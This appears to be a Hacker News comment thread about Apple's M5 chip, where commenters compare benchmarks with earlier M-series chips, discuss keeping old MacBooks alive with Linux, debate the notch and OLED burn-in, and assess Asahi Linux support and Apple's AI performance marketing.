              I’ve got a 2010 MBP that’s still perfectly suitable, but without OS updates, I can’t get a browser that websites will load cleanly on, can’t use Xcode, bunch of the Apple services the company hooks you on don’t work, etc. Used OpenCore bootloader to extend its life into newer macOSes, but that’s getting hard to keep up with. What a (e)waste.

              • snowwrestler 13 hours ago

                I’ve got a “late 2008” MacBook Pro that connects to sites ok in Firefox. That seems to be the browser that does the best at long-term support for old Macs.

                • brucehoult 10 hours ago

                  Both those machines will run the latest Ubuntu just fine, and the latest Chrome (or Firefox) on it.

                  Just copy the LiveCD image onto a USB stick, insert, boot holding down the Option key, and you can try it without actually installing it (i.e. leaving your MacOS untouched).

                • jkestner 11 hours ago

                  Good point. I remembered not getting Firefox to work but that was an even older Mac I was dusting off to run a birdcam installation.

              • davidkwast 13 hours ago

                You can use Ubuntu. I use Ubuntu on a 2009 MBP and on a 2010 too.

                • jkestner 11 hours ago

                  Hadn't thought of doing that - I'm not a natural Linux person myself and I'm repurposing it for an 11yo. But maybe it's not so different from their school Chromebook for what they need. Just removes some of the nice Apple family features and the apps they'd be inheriting, but that's what I get for not paying the tax with new hardware purchases.

                  • 20after4 7 hours ago

                    11 is a great age to start learning Unix.

                    Edit: I know Mac OS X is a Unix and Linux is technically a clone, however, of the two, Linux & GNU is a much better environment to learn in.

              • NetMageSCW 13 hours ago

                It is 15 years old - I think it is past eWaste into antique.

                • hoppp 11 hours ago

                  Nah, antiques are stuff like the apple 2 or the amiga, it was a different world back then

                  15 years old is just old and has too little ram

                  • jkestner 11 hours ago

                    Sure. But my needs haven't exceeded that RAM. I just want to keep doing the things I was doing for years on it happily, but security updates, broken services and website bloat have intervened.

                • jkestner 11 hours ago

                  You're talking to someone who's fixed their microwave several times to keep it going 20 years.

              • holoduke 13 hours ago

                My old macbook Air from 2010 is already running 6 years home assistant on Ubuntu. It's in my fuse/meter room running 24 hours.

            • zahirbmirza 14 hours ago

              Depends if you use xcode or not...I still have my macbook 12inch, for work use, it is amazing, but I can't run the latest xcode, making it defunct for some of my uses. It would be fine running xcode weak as it is; i am sure. Liquid glass might have killed it tho.

            • skor 13 hours ago

              I use one from around that time to teach my kid basic stuff, you can run linux on it as well.

            • manmal 14 hours ago

              Patches for old OS versions are unfortunately not 100% covering all security issues. Apple is often arguing that vulns can only be fixed in actively supported versions.

            • zahirbmirza 14 hours ago

              Also, would love to hear any tips you have for eeking out use...Sounds like you may have some...

        • oblio 15 hours ago

          You're not opening enough Chrome tabs. Or Electron apps.

        • kinnth 12 hours ago

          yup I'm an M1 max laptop, i actually went upto an m4 pro and went back the m1 max, it could handle more trading screens!

        • j45 6 hours ago

          So many articles I’ve read about the Mac Studio is how it very easily could be a 10year computer effortlessly.

          The additional cooling in them seems quite helpful to their performance compared to the same chip in a laptop.

        • andrepd 15 hours ago

          You're clearly running low-intensity tasks (pro photo editing, music production, software dev, generally all at the same time) instead of highly-demanding ones (1 jira tab)

        • poultron 15 hours ago

          Obsolescence comes when Apple conveniently "optimizes" a new architecture in the OS for a new chip... that conveniently, ironically, somehow severely de-optimizes things for the old chips... and suddenly that shiny new OS feels slow and sluggish and clunky and "damn I need to upgrade my computer!." They'll whitewash it not as planned obsolescence but optimization for new products. Doesn't have to be that way, shouldn't be that way, but its incredibly profitable.

          • MPSimmons 15 hours ago

            Maybe by that time ARM linux on this platform will be excellent and we can migrate to it for old gear. I still have a 2011 MBP running Linux on my electronics workbench and it is just fine.

      • burnt-resistor 4 minutes ago

        Did a M1 Max (32 GiB, 1 TB -> 64 GiB, 4 TB - Z14X000HR) upgrade in early 2024 for ~$1800 USD with ~20 battery cycles and 99% battery health. Avoiding *os 28 because I refuse unusable, battery-wasting bling.

      • smith7018 14 hours ago

        You should wait until next Fall if you don't really need to replace your M1 Max. Rumors say that Apple's going to redesign the Macbook Pros next year with an OLED screen.

        • jltsiren 13 hours ago

          I would rather buy the last refresh of the old design. Waiting for a redesign is risky, as some redesings are just bad (like the touchbar MBP). And Apple is opinionated enough that it often refuses to admit its mistakes and sticks to them for years.

          • bee_rider 10 hours ago

            Apple has had missteps of course, but you can usually buy last year’s model, right?

            OLED is much better than other display technology, and they’ve done other OLED screen devices. It would be quite surprising to see them screw this up—not impossible, sure. They could screw up some other design element for example. But, it would be somewhat surprising, right? And OLED is a big change so maybe they won’t also feel the need to mess with other stuff.

            • hakunin 10 hours ago

              Everything I recently researched about display technologies, mini LED has no image retention/burn-in issues, and renders fonts better compared to OLED. It seems you want OLED for media (and mobile, since you often alternate entire screens), IPS for work, and mini LED as a more expensive compromise without burn-in, that does text as well as IPS, and media almost as well as OLED. I wonder why would they even want to use OLED on work screens with lots of static content, did something major change about the tech such that it doesn't suffer these issues anymore?

              • chronogram 6 hours ago

                Mac hasn't used subpixel rendering for fonts since Mojave and has never used it on iOS so there's no difference to font rendering on Apple platforms.

              • bee_rider 9 hours ago

                I think OLED burn in has been mitigated fairly well recently. At least, I have a Linux laptop from 2021 that I use for work as well as fun, no particular care taken to avoid it, but no burn-in so far.

                Font rendering, hard to say, I think it’s just preference.

                Terminals look very nice with actual-black backgrounds.

                • freeAgent a few seconds ago

                  I have a Samsung QD-OLED monitor from 2023 which has very noticeable burn-in at low brightness levels. This is from the era of "OLED burn-in has been solved," and it's soured me on OLED monitors since I do photography as a hobby and don't want burn-in affecting how I see images on my screen. I think it's fine for televisions, but I don't like it for PC use where I have static windows on my screen for a long time. I even used dark mode and still got burn-in pretty quickly, for example where it draws the border between side-by-side windows (so, a vertical line down the middle of my screen). Once I noticed that, I started resizing my side-by-side windows so their border isn't in the same place every day, but the damage is done.

          • jameslk 10 hours ago

            As someone who went all in on the 2019 i9 Intel MBP months before Apple announced the M1 MBP, I can tell you this strategy is not always optimal. Years of managing overheating and underperformance due to said overheating has not been fun. Especially when I found out about the benchmarks showing those M1s were running circles around the laptop I purchased, for a fraction of the price

            • hellotheretoday 9 hours ago

              I grabbed a broken 2019 i9 and repaired it. I thought I had fucked up the repair because it kept thermal throttling but after researching a bit and eventually comparing to a known good machine it appears that I did fine and no, it just does that

              Garbage design

          • anigbrowl 13 hours ago

            I got an old MBP with the touchbar as payment for a favor last year and I quite like it. I don't know why it gets so much hate.

            • astrospective 12 hours ago

              The butterfly switches break easily and replacing the entire keyboard because of it is a pain. I held on to my 2015 intel MBP for ages waiting for them to address that.

            • jltsiren 12 hours ago

              I had one for a few years. The keyboard was bad, and there was no physical escape key. There were lot of accidental clicks with the touchbar, as it had a different logic (touch to use rather than press to use) than the other keys, or the function keys on every other keyboard. And I was using USB-A and HDMI adapters all the time, as the laptop lacked essential ports.

              • Telemakhos 10 hours ago

                The first M1 MacBook Pros had both the touchbar and a decent keyboard. I love mine so long as the driver running the touchbar doesn't crash, which it does sometimes necessitating a reboot. My main problem is how few programs actually ever made good use (not just some use) of the touchbar.

                As for the dongle issue, that went away when I upgraded to a USB-C monitor at home and USB-C equipment at work. I can dock to a monitor or plug into a projector to give a presentation and charge with the same cable. At this point I don't want an HDMI port, and I'm kind of sad that the next laptop will probably have a dedicated charging cable.

                • jltsiren 9 hours ago

                  I travel quite a bit. HDMI remains useful, as most monitors / TVs / projectors I encounter still don't have USB-C input. USB-A is also somewhat useful, as I charge various devices from my laptop to avoid dealing with too many international power adapters.

                  The most common ports I need are roughly: 1. USB-C; 2. HDMI; 3. USB-A; 4. second USB-C; 5. third USB-C; 6. second USB-A; 7. DisplayPort; 8. fourth USB-C.

              • jen20 8 hours ago

                I still have both 13" and 15" Touch Bar MacBook Pros from 2016, and the keyboard is hands down my favorite laptop keyboard to type on since the Lenovo X220. The new ones aren't _bad_ but not as nice. The physical escape key doesn't matter to me, I have had it mapped to caps lock forever.

                I also used to use the Touch Bar for a status display for things like tests, it was honestly great. Do not miss the battery life and performance compared to my subsequent Apple Silicon laptops, but definitely miss the keyboard.

            • no_wizard 13 hours ago

              I think it’s because of the non optionality of it. If you could have gotten every but sans/includes the touch bar people could have simply made their choices based on preference.

              In the end they reverted because they were not willing to make it optional. They also never released a touch bar keyboard for desktop, which would have made it more useful perhaps

            • skor 13 hours ago

              no escape key, that's one reason

              • Mogzol 11 hours ago

                My 2019 MBP has a touch bar and a physical escape key, so at least some models did have one. I agree not having it would make the touch bar way worse. As it is I don't mind it.

        • kossTKR 14 hours ago

          For the love of god remove the notch, that's the only idiotic branding vestige left.

          • mort96 13 hours ago

            And put the web cam where?

            The notch is bigger than it should be for sure, I would've loved for it to be narrower. But I don't really mind the trade-off it represents.

            You could add half an inch of screen bezel and make the machine bigger, just to fit the web cam. Or you could remove half an inch of screen , essentially making the "notch" stretch across the whole top of the laptop. Or you could find some compromised place to put the camera, like those Dell laptops which put the camera near the hinge. Or you can let the screen fill the whole lid of the laptop, with a cut-out for the camera, and design the GUI such that the menu bar fills the part of the screen that's interrupted by the notch.

            I personally don't mind that last option. For my needs, it might very well be the best alternative. If I needed a bigger below-the-notch area, I could get the 16" option instead of the 14" option.

            • joking 9 minutes ago

              I don't have a problem with the notch, I have a problem with the icons not showing in the status bar and there isn't a *** way to show them. It's so difficult to add a overflow button that shows the hidden icons?

            • mirekrusin 6 hours ago

              Two cameras on the top corners or 4 in each corner for better gaussian splatting.

            • bobthepanda 13 hours ago

              I wonder how hard it would be to have a camera 'pop up' from the laptop. (i'm not a hardware guy)

              • eastbound 12 hours ago

                Some laptops literally have the camera behind the screen. As in, behind pixels. It’s possible and classy.

                • Lammy 11 hours ago

                  My REDMAGIC Android phone is like this too and I love not having a stupid notch cut out of the screen. I've hated them since the very first time I saw a iPhone X. Can't believe such a ridiculous design defect infected Macbooks too :/

                • bobthepanda 12 hours ago

                  do you have a picture of what that looks like? having a hard time conceptualizing that.

                  • Tuna-Fish 12 hours ago

                    It's not visible at all. The camera is just placed behind the screen.

                    OLED screens are inherently transparent, there is just a light-emitting layer in them. You put your camera behind the screen, and either make the few pixels on top of the lens go black when it's on, or you use a lot of software to remove the light that comes from the screen and clean up the picture.

              • XorNot 9 hours ago

                My Oppo Reno 2z phone does this and honestly its been working great for years. I really like not having a notch.

                Feels like for a laptop it would be durable enough and also fulfill the "webcam is physically blocked when off".

            • hu3 13 hours ago

              Dell XPS has webcam, no notch and same o bezel as macbooks.

              Maybe it's a patent thing.

              • mort96 12 hours ago

                They have the solution with the web cam near the hinge that I mentioned. I had a couple of Dell XPS laptops like that. It's fine if the webcam is really just an afterthought for you, but it does mean the webcam has a very unflattering angle that's looking up your nostrils.

                I use my webcam enough these days to take part in video meetings that it'd be a pretty big problem for me.

                • gargan 12 hours ago

                  Checkout the Dell XPS 13 9345, webcam is on top but with thinner bezels than a Macbook, it's got a Snapdragon ARM processor for good battery life, OLED screen, upto 64GB RAM, and is smaller and lighter than a Macbook Air

                  Snapdragon X Elite 2 processor will be out next year for the refreshed model

                  • y1n0 9 hours ago

                    That top bezel is twice the size of my m4 mbp.

                    • gargan an hour ago

                      You're looking at the wrong laptop, the Dell XPS 13 9345 has a ~88.6% screen to body ratio, the Macbook Pro 14 M4 2024 has a ~84.6% screen to body ratio.

                      The weight is the big one for me - only 2.5 lbs vs 3.4 lbs

                      Remember the Dell has an 18 month old processor, X Elite 2 coming out next year.

                      Source for all these stats: https://nanoreview.net/en/laptop-compare/dell-xps-13-9345-20...

                • badc0ffee 11 hours ago

                  Also it gives the huge hands effect when you're typing.

                • cyberax 11 hours ago

                  > They have the solution with the web cam near the hinge that I mentioned.

                  Companies tried that. You get very strange-looking up-your-nose pictures.

          • brookst 13 hours ago

            You want a strip of black plastic across the entire top rather than pixels to the left and right of the cameras?

      • croemer 3 hours ago

        Personal workloads that benefit from upgrade: Running a Python script that's CPU limited, aligning genomes in parallel on all cores. It's common that I need to wait 2min for those tasks to complete. Shaving off 30s for faster iteration loop. is meaningful.

      • montebicyclelo 15 hours ago

        On the contrary; now might be a good time to get an M1 Max laptop. A second hand one, ex-corporate, in good condition, with 64Gb RAM, is pretty good value, compared to new laptops at the same price. It's still a fantastic CPU.

        • ozarkerD 14 hours ago

          That's what I did, bought a used one with 64GB and a dent in the back for ~$1k a year back or so. Some of the best money i've ever spent.

        • andrei_says_ 13 hours ago

          Where would one look for ex-corporate MacBook pros?

          • montebicyclelo 3 hours ago

            At your own risk — one place is ebay sellers with a large number of positive reviews, (and not much negative), who are selling lots of the same type of MacBook pros. My assumption is they've got a bunch of corporate laptops to sell off.

        • simondotau 13 hours ago

          Honestly the only Apple Silicon e-waste has been their 8GB models. And even those are still perfectly good for most people so long as they use Safari rather than Chrome.

      • dgacmu 12 hours ago

        I finally replaced my m1 mini because of memory capacity (16GB doesn't cut it for me and jumping to 64 was worth it), but I'm having the same feeling about my M1 pro MBP with 32GB. It just still works so well for nearly everything I do.

        I'm guessing the m5 pro may support 64GB but...

      • nu11ptr 15 hours ago

        I am in the same boat as my Rust compile times are solid. I'm good for now, but with the M4 max twice as fast, upgrading to the M5 max next year could be a tempting upgrade.

      • throw0101d 9 hours ago

        > How do you justify it?

        * I want it.

        * I have met all my other financial obligations.

        * I do not have to go into debt for it.

        * QED

        • SchemaLoad 6 hours ago

          You'd also want to evaluate what it lets you do which improves your life rather than just "I want it"

          • saagarjha an hour ago

            I think you misunderstood the sentiment behind the comment

      • winstonp 10 hours ago

        Rumor has it M6 Pro will be a total redesign. Whether that's a good or bad thing depends on how much you trust Apple to nail a next gen design first try again

      • gigatexal 13 hours ago

        I do a lot with VMs, and other memory intensive things so I went with 128GB of ram. I'm hoping for a laptop with 256GB+ in a few generations and one with more or less double the oomph would be nice. Everything can be faster, bring it on!

      • nine_k 8 hours ago

        Running AI inference faster, of course!

      • timcobb 9 hours ago

        Compilation times?

      • seanmcdirmid 6 hours ago

        > How do you justify it?

        Local LLMs.

        • gigatexal 4 hours ago

          Yup LM studio loves ram.

      • dzhiurgis 10 hours ago

        Weird timing but my m1 started lag out recently. Must be just in my head.

      • varispeed 12 hours ago

        I have M1 Max 32GB and I think I'll go with M5 Max simply because I need more RAM. I am constantly swapping about 16GB. I don't feel it that much, but it bothers me.

      • zer0zzz 12 hours ago

        I have an easy one: asahi Linux only runs on m1 and m2 at the moment

    • grishka 11 hours ago

      My M1 Max works just fine. Everything is as snappy as it was the day I bought it. I don't see any reason it might need a replacement any time soon. (The fact that I don't install major system updates unless absolutely necessary probably helps too)

    • rootusrootus 15 hours ago

      I was thinking similar thoughts about my M2 Max MBP. I look at the newer chips and wonder at what point will (or has it happened already) will the base M chip outperform my M2 Max? I'll probably hold onto it a while anyway -- I think it will be a while before I find 96GB limiting or the CPU slow enough for my purposes, but I'd still like to know how things are progressing.

      • lagadu an hour ago

        Base M4 was already slightly outperforming the M2 Max in CPU. GPU-wise it's nowhere near close.

  • rick_dalton 15 hours ago

    The multi-core geekbench score for the M5 is the 9 core version iirc. The 10 core score isn't out yet as far as I know.

  • alberth 14 hours ago

    Did TSMC 2nm slip to next year, or was it always planned to be 2026?

    • hooch 12 hours ago

      Always been one more iteration of 3nm in the plan

  • ElijahLynn 15 hours ago

    Thank you! Since this is the top rated comment, can you also add M1 and M2 as well?

  • LarsDu88 14 hours ago

    Does this mean the M5 is serious as fast as my intel 13900 cpu?

  • jay_kyburz 14 hours ago

    Serious questions. How is Asahi these days? Is it ready as a daily driver? Is it getting support from Apple or are they hostile to it? Are there missing features? And can I run KDE on it?

    • pbasista 13 hours ago

      > How is Asahi these days?

      Much less active than it used to be when it was run by Hector Martin. The core development is a lot slower. Although the graphics stack, for instance, has reached a very mature state recently.

      > Is it ready as a daily driver?

      It depends. Only M1 and M2 devices are reasonably well-supported. There is no support for power-efficient sleep, Display Port, Thunderbolt, video decoding or encoding, touch ID. The speakers overheat and turn off momentarily when playing loud for a longer period of time. The audio stack in general had to be built from ground up and it seems to me like there are bits and pieces still missing or configured sub-optimally.

      > Is it getting support from Apple?

      Not that I am aware of.

      > are they (Apple) hostile to it?

      Not to my knowledge.

      > Are there missing features?

      Plenty, as described above. There has been some work done recently on Thunderbolt / Display Port. Quite a few other features are listed as WIP on their feature support page.

      > Can I run KDE on it?

      Of course. KDE Plasma on Fedora is Asahi Linux's "flagship" desktop environment.

      • neobrain 3 hours ago

        Good and fair comment. Just adding some nuance:

        > There is no support for power-efficient sleep

        "power-efficient sleep" refers to discharging 1-2% battery over night rather than 10-20%. I.e. there's room for improvement, but the device can still be used without worrying much about battery life regardless (especially given how far a full charge gets you even without sleep).

        > Display Port, Thunderbolt

        Big item indeed, but it's actively worked on and getting there (as you mentioned).

        > video decoding or encoding

        Hurts battery performance, but otherwise I never noticed any other effect. YMMV for 4K content.

        > touch ID

        Annoying indeed, and no one has worked on this AFAIK.

        > The speakers overheat and turn off momentarily when playing loud for a longer period of time. The audio stack in general had to be built from ground up and it seems to me like there are bits and pieces still missing or configured sub-optimally.

        Sad to hear since I thought the audio heat model was robust enough to handle all supported devices. On my M1 Air I've never seen anything like this, but perhaps devices with more powerful speakers are more prone to it?

      • SchemaLoad 6 hours ago

        Am I misrepresenting the situation or did the whole project seemingly fall apart over an argument between Hector and Linus Torvalds in the mailing list about getting some driver merged?

    • SXX 14 hours ago

      On macbook air M1 Asahi is pretty usable when it comes to hardware support. And been usable for at least 1 year.

      Though either Fedora itself, how it built with Asahi or just running it with little disk space end up with freeze on boot after random updates. Twice, once without even rpmfusion enabled. Either some weird btrfs issue or I dont know what.

      Like I'm Linux dude for two decades and dont do anything fancy, so this is weird. Switched to Asahi Ubuntu on ext4 and it working great so far.

    • strogonoff 12 hours ago

      It is a shame Asahi supports only up to around M2 or so, because I really wanted to use it.

    • jay_kyburz 14 hours ago

      nevermind. Found this. Still a ways to go. https://asahilinux.org/docs/platform/feature-support/m4/#tab...

      • filmgirlcw 13 hours ago

        Yeah, given all the people with passion/ability for low-level reverse engineering have left the project, I don’t think we should ever expect to get greater than M2 support from Asahi. Maybe one day another project will pick up the ideas, but for anyone not wanting to use years old hardware, the dream of Linux almost natively existing on modern Apple silicon remains just that: a dream.

      • zargon 14 hours ago

        Asahi will probably only ever be feasible for years-old hardware. macOS is a total non-starter for me, so maybe one day I’ll end up with one of these, but only as some kind of tertiary / retro machine.

        • ar_lan 7 hours ago

          Why is it a non-starter for you?

          • jay_kyburz 4 hours ago

            Not the OP, but its a non starter for me because, I _was_ a mac guy for 10 years or so, but I changed job to one that required I use windows for game dev, and I discovered how locked in I was, and how painful it was to change. I'm not going back, no matter how nice the hardware is.

  • hinkley 11 hours ago

    That's a lot of memory bandwidth. Kinda surprised geekbench doesn't benefit more from the fatter pipe.

  • morshu9001 15 hours ago

    And the fastest M4 max was already fastest single and multicore CPU by a decent margin, while the fastest non-Apple CPU was only specialized for single or multi.

    • AnthonyMouse 14 hours ago

      The single thread performance for modern high performance CPUs are all very close to each other. Apple's latest usually has a small advantage because they're the first to use TSMC's latest nodes, which is good for something like 15-20%.

      The fastest multicore CPUs are the ones with a lot of cores, e.g. 64+ core Threadrippers. These have approximately the same single-core performance as everything else from the same generation because single-core performance isn't affected much by number of cores or TDP, and they use the same cores.

      Everyone also uses Geekbench to compare things to Apple CPUs but the latest Geekbench multi-core is trash: https://dev.to/dkechag/how-geekbench-6-multicore-is-broken-b...

      • musictubes 8 hours ago

        That article points out that GB5 and GB6 test multi-core differently. The author notes that GB6 is supposed to approach performance the way most consumer programs actually work. GB5 is better suited for testing things like servers where every core is running independent tasks.

        The only “evidence” they give that GB6 is “trash” is that it doesn’t show increasing performance with more and more cores with certain tests. The obvious rejoinder is that GB6 is working perfectly well in testing that use case and those high core processors do not provide any benefit in that scenario.

        If you’re going to use synthetic benchmarks it’s important to use the one that reflects your actual use case. Sounds like GB6 is a good general purpose benchmark for most people. It doesn’t make any sense for server use, maybe it also isn’t useful for other use cases but GB6 isn’t trash.

        • AnthonyMouse 5 hours ago

          > The only “evidence” they give that GB6 is “trash” is that it doesn’t show increasing performance with more and more cores with certain tests. The obvious rejoinder is that GB6 is working perfectly well in testing that use case and those high core processors do not provide any benefit in that scenario.

          The problem with this rejoinder is, of course, that you are then testing applications that don't use more cores while calling it a "multi-core" test. That's the purpose of the single core test.

          Meanwhile "most consumer programs" do use multiple cores, especially the ones you'd actually be waiting on. 7zip, encryption, Blender, video and photo editing, code compiles, etc. all use many cores. Even the demon scourge JavaScript has had thread pools for a while now and on top of that browsers give each tab its own process.

          It also ignores how people actually use computers. You're listening to music with 30 browser tabs open while playing a video game and the OS is doing updates in the background. Even if the game would only use 6 cores by itself, that's not what's happening.

          • morshu9001 4 hours ago

            Ok I had time to read through this, and yeah I agree, multicore test should not be waiting on so much shared state.

            There are examples of programs that aren't totally parallel or serial, they'll scale to maybe 6 cores on a 32-core machine. But there's so much variation in that, idk how you'd pick the right amount of sharing, so the only reasonable thing to test is something embarassingly parallel or close. Geekbench 6's scaling curve is way too flat.

            • AnthonyMouse an hour ago

              Yeah. I think it might even be worse than that.

              The purpose of a multi-core benchmark is that if you throw a lot of threads at something, it can move where the bottleneck is. With one thread neither a desktop nor HEDT processor is limited by memory bandwidth, with max threads maybe the first one is and the second one isn't. With one thread everything is running at the boost clock, with max threads everything may be running at the base clock. So the point of distinguishing them is that you want to see to what extent a particular chip stumbles when it's fully maxed out.

              But tanking the performance with shared state will load up the chip without getting anything in return, which isn't even representative of the real workloads that use an in-between number of threads. The 6-thread consumer app isn't burning max threads on useless lock contention, it just only has 6 active threads. If you have something with 32 cores and 64 threads and it has a 5GHz boost clock and a 2GHz base clock, it's going to be running near the boost clock if you only put 6 threads on it.

              It's basically measuring the performance you'd get from a small number of active threads at the level of resource contention you'd have when using all the threads, which is the thing that almost never happens in real-world cases because they're typically alternatives to each other rather than things that happen at the same time.

      • morshu9001 14 hours ago

        I was going by Geekbench. If it's broken then yeah.

  • LordDragonfang 14 hours ago

    Interesting to see that over 5 years (M1 was 2020), the benchmark performance has not quite doubled. Is this an indictment of Moore's law, or just Apple over-speccing the M1 and slowly decreasing that over time?

    • imoverclocked 13 hours ago

      Moore's law has never been an absolute and it's also about the number of transistors per mm/^2 ... not speed. Sometimes progress is a little faster and sometimes it's a little slower.

    • hinkley 11 hours ago

      More than double the memory bandwidth. Processors can't do much while they're stalled waiting for data to load.

  • B1FF_PSUVM 15 hours ago

    Thank you. Looking at replacing an Intel MacBook Air, I hope there are price drops on the "outdated" M4s (although an M2 phased out early this year would do well enough...)

    • testing22321 11 hours ago

      I replaced an intel MacBook Pro with a used m1 air. By far the fastest computer I have ever used. Massive, massive leap.

      • stefanfisk 6 hours ago

        Yeah, going from Intel to M1 is IMHO somewhat comparable to going from HDD to SSD.

  • jjcm 15 hours ago

    They're going to have a hard time selling the M5 when compared to the M4 Pro. Geekbench for that chip is 3843/22332, which is slightly slower for single core but better for multi, but also has thunderbolt 5 instead of 4.

    • GeekyBear 15 hours ago

      The numbers for M5 Geekbench are for the binned iPad Pro version with one performance core disabled.

      It's the only M5 device that leaked to the public early.

    • NetMageSCW 13 hours ago

      Fortunately they will be selling the M5 Pro against the M4 Pro (and more likely, their expectation is no one with the current Pro is going to upgrade for one generation) so it will be easier.

gcr 20 hours ago

So how many hardware systems does Apple silicon have for doing matrix multiplies now?

1. CPU, via SIMD/NEON instructions (just dot products)

2. CPU, via AMX coprocessor (entire matrix multiplies, M1-M3)

3. CPU, via SME (M4)

4. GPU, via Metal (compute shaders + simdgroup-matrix + mps matrix kernels)

4. Neural Engine via CoreML (advisory)

Apple also appears to be adding a “Neural Accelerator” to each core on the M5?

  • throwaway31131 15 hours ago

    Doesn’t that make sense though as each manipulates a different layer in the memory hierarchy allowing the programmer to control the latency and throughput implications. I see it as a good thing.

  • RataNova an hour ago

    Apple's clearly betting big on on-device AI workflows becoming the norm

  • nullbyte 17 hours ago

    Thankfully I think libraries like Pytorch abstract this stuff away. But it seems very convoluted if you're building something from the ground up.

    • gardnr 15 hours ago

      Does PyTorch support other acceleration? I thought they just support Metal.

      • joshuabaker2 12 hours ago

        You can convert a PyTorch model to an ONNX model that can use CoreML (or in some cases just convert it to a CoreML model directly)

  • twoodfin 16 hours ago

    Is this really strange? Matmul is just a specialized kind of primitive compute, one that is seeing an explosion in practical uses.

    A Mac Quadra in 1994 probably had floating point compute all over the place, despite the 1984 Mac having none.

  • jmrm 16 hours ago

    I wonder if some Apple-made software, like Final Cut, make use of all of those "duplicated" instructions at the same time for getting a better performance...

    I know how just the multitasking nature of the OS probably make this situation happens across different programs, but nonetheless would be pretty cool!

  • oskarkk 18 hours ago

    Would it be possible to use all of them at the same time? Not necessarily in a practical way, but just for fun? Could different ways of doing this on CPU be done in some extent by one core at the same time, given it's superscalar?

  • HeckFeck 15 hours ago

    Adding CPUs and GPUs on top of your CPUs and GPUs... Sounds like we've the spiritual successor of the Sega Saturn.

  • hannesfur 20 hours ago

    I inferred that they meant the neural engine cores by neural accelerators or it could be a bigger/different AMX (which really should become a standard btw)

  • llm_nerd 13 hours ago

    >Apple also appears to be adding a “Neural Accelerator” to each core on the M5?

    The "neural accelerator" is per GPU core, and is matmul. e.g. "Tensor cores".

eth0ws 9 hours ago

"When compared to Intel-based systems, it delivers up to 86x faster AI performance"

I'm imagining the engineers responsible for running the tests finely tuning the test suite for days and days so they could get that number into the press release, lol. There's no way that's a coincidence and someone definitely advocated for that line being the way it is.

https://www.apple.com/newsroom/2025/10/apple-unveils-new-14-...

  • jdiff 7 hours ago

    I'm quite upset I have nobody I know in real life who will appreciate this line.

    • bigyabai 7 hours ago

      We've come a long ways from insidious-but-clear "I'm a Mac" ads, to groanworthy-and-confusing "86x faster performance" promotional metrics.

  • Aperocky 7 hours ago

    What does AI performance even mean for intel based mac systems.. The last one was like 5 years ago?

    • bapak 6 hours ago

      Check all the comparisons on their website. They're not comparing their products to the previous gen, they're comparing them to years-old system.

      They could sell you a downgrade and still stay 2x M1 Pro performance (it was 4x from last year)

      Apple is a marketing company made to sell stuff.

      • nielsbot 5 hours ago

        > Apple is a marketing company made to sell stuff.

        That's like... every company? Are you saying they don't have good tech?

        • bapak 3 hours ago

          Marketing companies don't sell their own stuff, they sell others' stuff.

        • dimator 4 hours ago

          Gp is saying their primary expertise is advertising. It's hard to watch any apple announcement and not notice how utterly hyperbolic they are at touting their own achievements.

          Ya sure, you can say that every company must do that, but apple are exceptional at it. Once you start noticing the unlabeled performance charts, the missing baselines, the comparing with ages old models, the disingenuous "86x" metrics, the whole show becomes cringe worthy.

      • _kidlike 5 hours ago

        I've always disliked Apple because of its aggressive marketing..

    • XelNika 7 hours ago

      > production 1.7GHz quad-core Intel Core i7-based 13-inch MacBook Pro systems with Intel Iris Plus Graphics 645, 16GB of RAM, and 2TB SSD

      https://www.apple.com/macbook-pro/#footnote-4

      So yes, that is compared to a very old 14 nm design, presumably the i7-8557U per Wikipedia.

      • zingar 6 hours ago

        Your comment implies that it’s obviously not this spec that they compare against. Could you spell it out for the ignorant like me? What about that config makes it definitely not the thing that is 86x slower?

        • jdiff 4 hours ago

          I don't see anything in the GP that implies that. It's simply a CPU that was released before an entire AI economic bubble was a twinkle in Jensen Huang's eye. Of course it has piss-poor AI performance vs something with hardware dedicated to accelerating that workflow.

          It's not that the comparison is incorrect, just that it's a silly and unenlightening statement, bordering on completely devoid of meaning if it weren't for the x86 pun.

hannesfur 20 hours ago

It’s unfortunate that this announcement is still unspecific about what they improved in the Neural Engine. Since all we know about the Neural Engine comes from Apple papers or reverse engineering efforts (https://github.com/hollance/neural-engine), it’s plausible that they addressed some quirks to enable better transformer performance. They have written quite interesting papers on transformers on the Neural Engine:

- https://machinelearning.apple.com/research/neural-engine-tra...

- https://machinelearning.apple.com/research/vision-transforme...

Things have definitely gotten better with MLX on the software side, though it still seems they could do more in that area (let’s see what the M5 Max brings). But even if they made big strides here, it won’t help previous generations, and the main thing limiting Apple Intelligence (in my opinion) will continue to be the 8 GB of unified memory they still insist on.

  • trymas 20 hours ago

    > the main thing limiting Apple Intelligence (in my opinion) will continue to be the 8 GB of unified memory they still insist on.

    As you said - it won’t help previous generations, though since last year (or two??) all macs start with 16GB of memory. Even entry level macbook airs.

    • hannesfur 19 hours ago

      Thats true! I was referring to their wider line up, especially the iPad, where users will expect the same performance as on the Mac’s (they payed for an Mx chip) and they sold me an iPad Air this year that comes with a really fast M3 and still only 8 GB of RAM (you only get 16 on the iPad Pro btw if you go with at least 1TB of storage on the M4 Pro one)

      • doug_durham 16 hours ago

        "They sold me"? You me you bought.

      • moi2388 19 hours ago

        Why would you expect the same performance on iPad and MacBook Pro?

        The latter has up to 128GB of memory?

        • hannesfur 19 hours ago

          You probably wouldn’t with a Pro but you might between an iPad Pro and an MacBook Air. With the foundation models API they basically said that there will be one size of model for the entire platform, making smarter models on a MacBook Pro unrealistic and only faster ones possible.

          • LoganDark 19 hours ago

            Isn't Private Cloud Compute already enabling the more powerful models to be run on the server? That way the on-device models don't have as much pressure to be The One.

          • moi2388 18 hours ago

            That’s fair

    • raverbashing 18 hours ago

      I bet Cook authorized the upgrade with grinned teeth and I was all for it

  • RataNova an hour ago

    No matter how fast your Neural Engine is, it's not much help if you're constantly juggling memory just to run a model

  • liuliu 19 hours ago

    Faster compute helps, for things like vision language model that requires bigger context to be filled. My understanding is that ANE is still optimized for convolution load, and compute efficiency while the new neural accelerators optimized for flexibility and performance.

    • zozbot234 19 hours ago

      The old ANE enabled arbitrary statically scheduled multiply-add, of INT8 or FP16. That's good for convolution but not specifically geared for it.

      • liuliu 18 hours ago

        I am not an expert on ANE, but I think it is related to the size of register files and how that is smaller than what we need for GEMM on modern transformers (especially these fat ones with MoE).

        • zozbot234 18 hours ago

          AIUI the ANE makes use of data in unified memory, not in the register file. So this wouldn't be an inherent limitation. (OTOH, that's why it wastes memory bandwidth for most newer transformer models, which use heavily quantized data - the ANE will have to read padded/unquantized values and the fraction of memory bandwidth that's used for that padding is pure waste.)

